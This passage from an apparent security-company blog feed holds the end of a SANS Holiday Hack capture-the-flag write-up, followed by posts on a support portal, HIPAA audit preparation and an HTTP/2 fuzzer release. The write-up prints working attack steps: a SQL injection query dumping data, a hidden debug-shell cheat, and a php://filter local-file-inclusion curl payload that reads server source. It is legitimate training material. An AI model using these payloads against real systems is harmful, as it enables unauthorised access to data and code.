OK, we have the id of the MP3; now we need the actual file. Unfortunately, getaudio.php has a hard check that lets only the guest user download MP3s by id.

To get around this, we’ll change our query to SELECT username, filename, TO_BASE64(mp3) FROM `audio`, and we can grab the MP3 from the base64-encoded output.

Dungeon Game

During the course of the game, we were given a .zip file from one of the elves containing what appears to be a local copy of the “dungeon” game, as well as a data file in some odd format.

The URL dungeon.northpolewonderland.com is referenced in the APK resources, but there are no references to the URL in the application code itself.

Running an nmap scan on dungeon.northpolewonderland.com shows port 11111 open:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 15:fb:7c:8a:bc:b6:bb:e7:87:77:65:5c:47:31:a6:cd (DSA)
|   2048 0a:23:40:36:ad:21:e5:78:a5:4a:b6:cd:7e:b9:12:e2 (RSA)
|_  256 88:ad:73:c4:8e:c3:10:38:32:fe:98:f4:80:6a:de:38 (ECDSA)
80/tcp    open  http    nginx 1.6.2
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.6.2
|_http-title: About Dungeon
11111/tcp open  vce?

Connecting to this port starts a remote instance of the dungeon game.

root@sans:~/sans# nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.         This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

We can play the game fairly or we might be able to cheat.

Cheating it is.

We’ll start by analyzing the local version for any vulnerabilities we can use to beat the remote version.

We start by running the dungeon binary in gdb and disassembling the main function.

It looks like main is responsible for setting up some game state, and then calling the game_ function. Disassembling that gives quite a bit of information. I’ve snipped some of it out, but you can find the relevant pieces here.

One thing that sticks out is a string comparison after the user’s command is read:

   0x0000000000404996 <+101>:   mov    esi,0x419a34
   0x000000000040499b <+106>:   mov    rdi,rax
   0x000000000040499e <+109>:   call   0x400d00 <strcmp@plt>
   0x00000000004049a3 <+114>:   test   eax,eax
   0x00000000004049a5 <+116>:   jne    0x4049ae <game_+125>
   0x00000000004049a7 <+118>:   call   0x40a1df <gdt_>

After we submit a command, it’s checked against a string stored at 0x419a34. To figure out what that string is, we can run the gdb command x/s 0x419a34:

(gdb) x/s 0x419a34
0x419a34:   "GDT"

If our action in the game is “GDT”, something special happens. Trying it out, we’re dropped into what appears to be a debug shell:

>GDT
GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take

It’s likely that we could use the debug menu to take the treasures and put them in the room, beating the game that way. But, I figured that when the game is beaten, we’d likely see text telling us where to get the next MP3.

There’s a command listed, DT, that dumps a text string from the game. It asks for the index (a number) of the string you want. A quick binary search shows the final string is at index 1028; backing up a few entries through trial and error, dumping string 1024 gives this response:
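The manual probing amounts to a binary search for the highest index the game will answer; a sketch with a stand-in oracle in place of a real GDT session:

```python
def highest_valid(is_valid, lo=1, hi=4096):
    """Binary-search the largest index for which is_valid(i) is True,
    assuming valid indices form a contiguous range starting at lo."""
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if is_valid(mid):
            lo = mid        # mid works; the answer is mid or higher
        else:
            hi = mid - 1    # mid fails; the answer is below mid
    return lo

# Stand-in oracle: in the real game, is_valid(i) would send "DT" and the
# index i to the debug shell and report whether a string came back.
print(highest_valid(lambda i: i <= 1028))  # 1028
```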

GDT>dt
Entry:    1024
The elf, satisified with the trade says -
Try the online version for the true prize

Moving to the online version of the game and doing the same steps gives us the final result:

GDT>dt
Entry:    1024
The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.

Sending an email to the address returns the MP3.

Email With MP3

Debug Server

The URL dev.northpolewonderland.com is referenced only once in the APK - in the EditProfile page. To use the endpoint in the app, a remote debugging flag has to be set.

The app sends 4 variables to the server:

bundle.put("date", (new SimpleDateFormat("yyyyMMddHHmmssZ")).format(Calendar.getInstance().getTime()));
bundle.put("udid", android.provider.Settings.Secure.getString(getContentResolver(), "android_id"));
bundle.put("debug", (new StringBuilder()).append(getClass().getCanonicalName()).append(", ").append(getClass().getSimpleName()).toString());
bundle.put("freemem", Runtime.getRuntime().totalMemory() - Runtime.getRuntime().freeMemory());

After some trial and error, it looks like the important thing is that the “debug” parameter is properly set. The Java code setting it resolves to "com.northpolewonderland.santagram.EditProfile, EditProfile". If we have that set correctly, we can put arbitrary input for the other parameters and get this output:

{"date":"20161217185543","status":"OK","filename":"debug-20161217185543-0.txt","request":{"date":"20161212112233","udid":"1","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":"test","verbose":false}}

Requesting the file returned in the “filename” attribute returns the original data we sent.

One thing I noticed is that a variable called “verbose” is mixed into the output we receive. This variable isn’t set by the APK, but let’s try setting it to “true”:

curl -XPOST -H "Content-Type: application/json" dev.northpolewonderland.com -d '{"date" : "20161212112233", "udid" : "1", "debug" : "com.northpolewonderland.santagram.EditProfile, EditProfile", "freemem" : "", "verbose" : true}'

We get the following output, which looks to include a listing of all the files in the directory:

{  
   "date":"20161218000051",
   "date.len":14,
   "status":"OK",
   "status.len":"2",
   "filename":"debug-20161218000051-0.txt",
   "filename.len":26,
   "request":{  
      "date":"20161212112233",
      "udid":"1",
      "debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",
      "freemem":"echo",
      "verbose":true
   },
   "files":[  
      "debug-20161217233050-0.txt",
      "debug-20161217235834-0.txt",
      "debug-20161217235844-0.txt",
      "debug-20161217235909-0.txt",
      "debug-20161217235921-0.txt",
      "debug-20161218000007-0.txt",
      "debug-20161218000025-0.txt",
      "debug-20161218000051-0.txt",
      "debug-20161224235959-0.mp3",
      "index.php"
   ]
}

We can browse to the MP3 path returned and retrieve the file.

Banner Ad Server

The site at ads.northpolewonderland.com is a web application written using Meteor:

Web Application

Since I wasn’t familiar with the framework, this blog post came in handy.

Installing TamperMonkey and Meteor Miner revealed the following routes:

/aboutus
/admin/quotes
/affiliate/:affiliateId
/campaign/create
/campaign/review
/campaign/share
/create
/
/login
/manage
/register

Visiting the /admin/quotes page, we are told there are 5 records returned in the HomeQuotes collection, and that one of these records has an additional “audio” field.

We can dump the records by running the command HomeQuotes.find().fetch() in the Chrome DevTools console. The record that stands out contains an audio attribute revealing the path to the MP3 we’re looking for.

Uncaught Exception Handler Server

The URL ex.northpolewonderland.com/exception.php is used in a couple of places in the APK to write crash dumps in case of application errors. Looking through the decompiled Java code, we have to supply an “operation” and a “data” parameter to have our request accepted as valid JSON. Setting these to arbitrary values returns a sample response like this:

{
    "success" : true,
    "folder" : "docs",
    "crashdump" : "crashdump-cplJXU.php"
}

The operation specified in the source code is “WriteCrashDump”. If I change that to “ReadCrashDump”, I get this error:

Fatal error! JSON key 'data' must be set.

Setting a data key returns this error:

Fatal error! JSON key 'crashdump' must be set.

Looks like it will try to load the crashdump file specified in the data field. Trying “crashdump-cplJXU” returned the data that I sent in my initial request.

This is almost certainly an LFI vulnerability. Unfortunately, we can’t specify filenames directly, since the “.php” extension is appended to them, which causes the files to be processed by the server.

We can use PHP filters to get around this and dump out the source code of PHP pages, as described in this article.

This is the curl command to get the source code of the exception.php file:

curl -XPOST -H "Content-Type: application/json" http://ex.northpolewonderland.com/exception.php -d '{ "operation" : "ReadCrashDump", "data" : { "crashdump" : "php://filter/convert.base64-encode/resource=../exception" } }'

Sending this to base64 -d returns the PHP source.
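The payload construction and the decode step can be sketched together (the encoded reply below is a made-up sample, not the server's actual response):

```python
import base64

def filter_payload(resource: str) -> str:
    """php://filter wrapper that returns a file's source base64-encoded
    instead of executing it (the '.php' suffix is appended server-side)."""
    return "php://filter/convert.base64-encode/resource=" + resource

print(filter_payload("../exception"))

# The base64 blob the server returns is then decoded locally
# (sample blob shown here, not the real exception.php source):
source = base64.b64decode("PD9waHAgLi4uID8+")
print(source.decode())  # <?php ... ?>
```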

The source tells us that the MP3 is in the webroot, so we can just grab it:

$ wget ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
--2016-12-17 12:39:34--  http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
Resolving ex.northpolewonderland.com... 104.154.196.33
Connecting to ex.northpolewonderland.com|104.154.196.33|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 223244 (218K) [audio/mpeg]
Saving to: 'discombobulated-audio-6-XyzE3N9YqKNH.mp3'

discombobulated-audio-6-XyzE3N9YqKNH.mp3           100%[================================================================================================================>] 218.01K   353KB/s    in 0.6s

2016-12-17 12:39:38 (353 KB/s) - 'discombobulated-audio-6-XyzE3N9YqKNH.mp3' saved [223244/223244]

Part 5: Finding Santa’s Captor

After gathering all seven MP3 samples, we can reassemble them to find Santa’s captor. Listening to the samples, it seemed as though they had been slowed down.

Importing all the audio samples into Audacity, aligning them end-to-end, and increasing the tempo revealed the phrase:

Father Christmas, Santa Claus. Or, as I've always known him, Jeff.
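The speed-up step can be roughly sketched with the standard-library wave module, assuming the MP3s are first converted to WAV. Note that this naive frame-rate change raises pitch along with speed, unlike Audacity's tempo effect, which preserves pitch:

```python
import wave

def speed_up(src, dst, factor=2.0):
    """Crudely speed up a WAV by raising its frame rate.

    src/dst may be file paths or seekable file-like objects. The samples
    are copied unchanged; only the playback rate in the header changes.
    """
    with wave.open(src, "rb") as r:
        params = r.getparams()
        frames = r.readframes(r.getnframes())
    with wave.open(dst, "wb") as w:
        w.setparams(params._replace(framerate=int(params.framerate * factor)))
        w.writeframes(frames)

# Usage (hypothetical file names):
# speed_up("combined.wav", "combined_fast.wav", factor=2.0)
```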

Using this as the passphrase to the last door reveals that Santa’s captor was Dr. Who.

Dr. Who

Conclusion

The team at SANS really outdid themselves with this year’s Holiday Hack challenge. The tasks were approachable while still presenting a challenge, and the entire game was polished.

Events like the Holiday Hack challenge, as well as the CTFs held throughout the year, are a great way to sharpen skills and learn something new. I highly recommend not only participating in challenges like this, but also reading how other people solved the same challenges, because they may have approached them in completely different ways.

I’m already looking forward to next year’s challenge!

]]>
<![CDATA[Announcing the Duo Help Center Ticket Portal]]> https://duo.com/blog/announcing-the-duo-help-center-ticket-portal https://duo.com/blog/announcing-the-duo-help-center-ticket-portal Fri, 06 Jan 2017 00:00:00 -0500

One of our main priorities is continuously improving our customers’ support experience at Duo. Toward that goal, we are excited to announce the public launch of our support ticket management portal functionality in the Duo Help Center.

In addition to our existing Knowledge Base, the Help Center now includes the ability for you to file and manage your support cases. This functionality is available for all paying editions.

To access the ticket management portal, administrators need to log in at admin.duosecurity.com and click the Support Tickets link in the navigation bar on the left:

Duo Support Ticket Portal

In the portal you’ll be able to view a comprehensive record of your support cases, submit new tickets to the Duo Support Team, and view & update ongoing cases at any time. When an issue has been resolved, you will be able to provide feedback on your support experience.

We believe that managing your support cases from the Help Center ensures the most secure and efficient experience for tracking issues you may encounter when using Duo’s products. You will also be able to view issues submitted by other Duo Administrators on your account. This reduces the risk of creating duplicate issues and increases awareness across your organization.

While Knowledge Base content will remain publicly accessible, the ticket management portal requires authentication to your account and can only be accessed by listed administrators for all paid editions.

If you have any feedback while using the new Help Center functionality, please contact us at support@duo.com.

]]>
<![CDATA[Healthcare & Business Associates: Prepare for 2017 HIPAA Audits]]> https://duo.com/blog/healthcare-and-business-associates-prepare-for-2017-hipaa-audits https://duo.com/blog/healthcare-and-business-associates-prepare-for-2017-hipaa-audits Wed, 04 Jan 2017 09:00:00 -0500

Calling all healthcare organizations, providers, hospitals and business associates - are you ready for the HIPAA security audits coming in 2017?

The Office for Civil Rights (OCR), the governing body that enforces the Health Insurance Portability and Accountability Act of 1996 (HIPAA), will be conducting a small number of onsite and desk audits, and contacted 167 healthcare providers and 48 business associates last year, according to HealthcareITNews.com.

Business associates include vendors that provide services to healthcare organizations, and may be held liable for a breach of healthcare patient data or security. A few examples of business associate services include legal, actuarial, consulting, accounting, data aggregation and financial services. Learn more about business associates.

The OCR will launch its full audit program to help assess HIPAA compliance efforts and discover new security risks in order to provide better guidance for healthcare organizations and business associates. The OCR is looking for policies and procedures related to the HIPAA Privacy, Security and Breach Notification rules. See specifics about each area, and what the OCR is looking for, in its audit protocol.

Two major problem areas the OCR has seen in past audits are the implementation of risk analysis and risk management.

Risk Analysis for Healthcare

According to HHS.gov, the risk analysis process identifies threats and vulnerabilities to systems containing electronic protected health information (ePHI).

HHS.gov references the National Institute of Standards and Technology (NIST) Special Publication (SP) 800-30 when it comes to guidance for different types of threats:

  1. Human: Incidents enabled or caused by humans. They can be unintentional (inadvertent data entry) or deliberate (malicious software, network-based attacks, unauthorized access, etc.).
  2. Natural: Disasters that may affect systems containing data or networks, including floods, earthquakes, electrical storms, etc.
  3. Environmental: Long-term power failure, pollution, chemicals, and liquid leakage.

Vulnerabilities may fall in the Human category, and are defined in NIST SP 800-30 as a “flaw or weakness in system security procedures, design, implementation, or internal controls that could be exercised (accidentally triggered or intentionally exploited) and result in a security breach or a violation of the system’s security policy.”

A risk analysis includes:

  • Taking inventory of all systems and applications used to access and store data
  • Classifying systems and apps by level of risk
  • Assessing current security measures
  • Estimating the likelihood and potential impact of threat occurrence
  • Anticipating the consequences of lost, damaged or corrupted data and data systems
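As a rough illustration of the inventory-and-classification steps above, a risk analysis can be modeled as scoring each system by likelihood and impact, then ranking the results. The system names, scales and weights below are hypothetical examples, not part of the OCR audit protocol or NIST SP 800-30:

```python
from dataclasses import dataclass

@dataclass
class System:
    """One entry in the inventory of systems/apps that store or access ePHI."""
    name: str
    likelihood: int  # estimated likelihood of a threat occurring, 1 (low) to 3 (high)
    impact: int      # anticipated impact of lost or corrupted data, 1 (low) to 3 (high)

    @property
    def risk(self) -> int:
        # A common qualitative scheme: risk = likelihood x impact.
        return self.likelihood * self.impact

# Hypothetical inventory of systems handling patient data.
inventory = [
    System("patient-portal", likelihood=3, impact=3),
    System("billing-db", likelihood=2, impact=3),
    System("intranet-wiki", likelihood=2, impact=1),
]

# Classify by level of risk: highest-risk systems first, so remediation
# effort can be prioritized.
ranked = sorted(inventory, key=lambda s: s.risk, reverse=True)
```

In practice the scales, threat categories and scoring method should come from your own risk analysis process; the point is that the output is a prioritized list, not a flat inventory.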

This guide, HIPAA Security Series: Basics of Risk Analysis and Risk Management, provides more in-depth, step-by-step example risk analyses and risk management plans that both healthcare organizations and their business associates can customize to their needs.

Risk Management for Healthcare

Risk management is the actual implementation of security measures to reduce an organization’s risk of losing or compromising its patient data, as well as to meet general security standards, according to the HHS.

According to NIST, the risk management framework includes:

  • Categorizing information systems
  • Selecting, implementing and assessing security controls
  • Authorizing information systems
  • Monitoring security controls

One way to protect against known system and software vulnerabilities is to keep your applications up to date, and select a security solution that detects out-of-date and risky devices logging into your systems containing patient data. This can ensure only trustworthy devices can access confidential information.

Old vulnerabilities are often leveraged by malicious hackers seeking to gain unauthorized access to your data and systems. By keeping your software and devices updated, you can ensure you have the latest security patches necessary to prevent successful attacks.
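A device-hygiene check of this kind often reduces to comparing an installed software version against the minimum patched release allowed by policy. The sketch below is a simplified illustration of that idea (the version numbers and policy are hypothetical, and this is not how Duo's product implements it):

```python
def parse_version(v: str) -> tuple:
    """Turn a dotted version string into a comparable tuple, e.g. '52.0.1' -> (52, 0, 1)."""
    return tuple(int(part) for part in v.split("."))

def is_out_of_date(installed: str, minimum_patched: str) -> bool:
    """Flag a device whose installed version predates the minimum patched release."""
    return parse_version(installed) < parse_version(minimum_patched)

# Hypothetical policy: flag browsers older than the release containing
# the latest security patches before they touch systems with ePHI.
flagged = is_out_of_date("52.0.1", minimum_patched="53.0")
```

Real version schemes (build metadata, pre-release tags) need more careful parsing, but tuple comparison captures the core check.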

Another essential security control is related to access controls and authentication to systems containing patient data. Implementing two-factor authentication across your organization can ensure only trusted and legitimate users can access applications and patient data by verifying their identity via a second factor.
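Second factors are commonly implemented as time-based one-time passwords (TOTP, RFC 6238), where the server and the user's device derive a short code from a shared secret and the current time. As a minimal sketch of how such a verification works (an illustration of the standard algorithm, not Duo's implementation):

```python
import hashlib
import hmac
import struct

def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """Compute an RFC 6238 TOTP code using HMAC-SHA1 (the common default)."""
    counter = for_time // step                # number of time steps since the epoch
    msg = struct.pack(">Q", counter)          # 8-byte big-endian counter
    digest = hmac.new(secret, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

def verify(secret: bytes, submitted: str, now: int, window: int = 1) -> bool:
    """Accept codes from adjacent time steps to tolerate clock drift."""
    return any(hmac.compare_digest(totp(secret, now + i * 30), submitted)
               for i in range(-window, window + 1))
```

The shared secret and test time below come from the RFC 6238 test vectors, so the expected code is well known; a production system would also need rate limiting and replay protection.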

Strong access controls can help prevent breaches due to threats like phishing, which may have been the root cause of a 2015 data breach at Anthem, the second-largest health insurer in the U.S. Stolen employee credentials gave malicious hackers access to its database, affecting 80 million patients.

Learn more about securing access to healthcare data and download Duo’s Guide to Securing Patient Data.

]]>
<![CDATA[HTTP/2 Peach Pit for Microsoft Edge]]> https://duo.com/blog/http2-peach-pit-for-microsoft-edge https://duo.com/blog/http2-peach-pit-for-microsoft-edge Fri, 23 Dec 2016 00:00:00 -0500

Happy Holidays from Duo Labs. This is a very short blog post to announce the availability of a tool that some of you might find useful. Here at Duo Labs, we believe that open sourcing security research tools helps the greater research community push technology forward. We hope you find this useful in your own research or testing efforts, and we encourage everyone to consider sharing tools that are typically kept proprietary with the public, in the spirit of bettering security for everyone.

During the last part of this year, we spent a little time here at Duo Labs looking at Microsoft Edge. Part of that work, of course, is performing fuzz testing against the various protocols the browser supports. One fuzzing tool we like to use is Peach Fuzzer, which, in the case of Microsoft Edge, we used to test the emerging HTTP/2 protocol.

While we are still deciding how much more we want to look at Microsoft Edge, we thought it might be helpful to release the Peach Pit that Mikhail Davidov created for use with the Enterprise version of Peach Fuzzer.

This Peach Pit implements the HTTP/2 protocol (RFC 7540) and is targeted at Microsoft Edge.
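For readers curious what fuzzing a binary protocol like HTTP/2 involves: a fuzzer ultimately generates and mutates wire-format frames, each of which starts with the 9-octet header defined in RFC 7540 section 4.1 (24-bit length, 8-bit type, 8-bit flags, one reserved bit plus a 31-bit stream identifier). The following sketch is our own illustration of that frame layout, not code from the Peach Pit itself:

```python
import struct

def h2_frame(frame_type: int, flags: int, stream_id: int, payload: bytes = b"") -> bytes:
    """Serialize an HTTP/2 frame per RFC 7540 section 4.1."""
    if len(payload) > 2 ** 24 - 1:
        raise ValueError("payload exceeds the 24-bit frame length field")
    header = struct.pack(">I", len(payload))[1:]  # 24-bit big-endian length
    header += struct.pack(">BBI", frame_type, flags, stream_id & 0x7FFFFFFF)
    return header + payload

# An empty SETTINGS frame (type 0x4) on stream 0 -- the first frame a
# client sends after the connection preface, and a natural fuzzing target.
settings = h2_frame(0x4, 0x0, 0)
```

A grammar-based fuzzer like Peach encodes this same structure declaratively (in Peach's case, as an XML "pit" file) and then mutates field values and lengths to probe the parser on the other end.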

Full documentation and all code are available on Mikhail’s GitHub.

]]>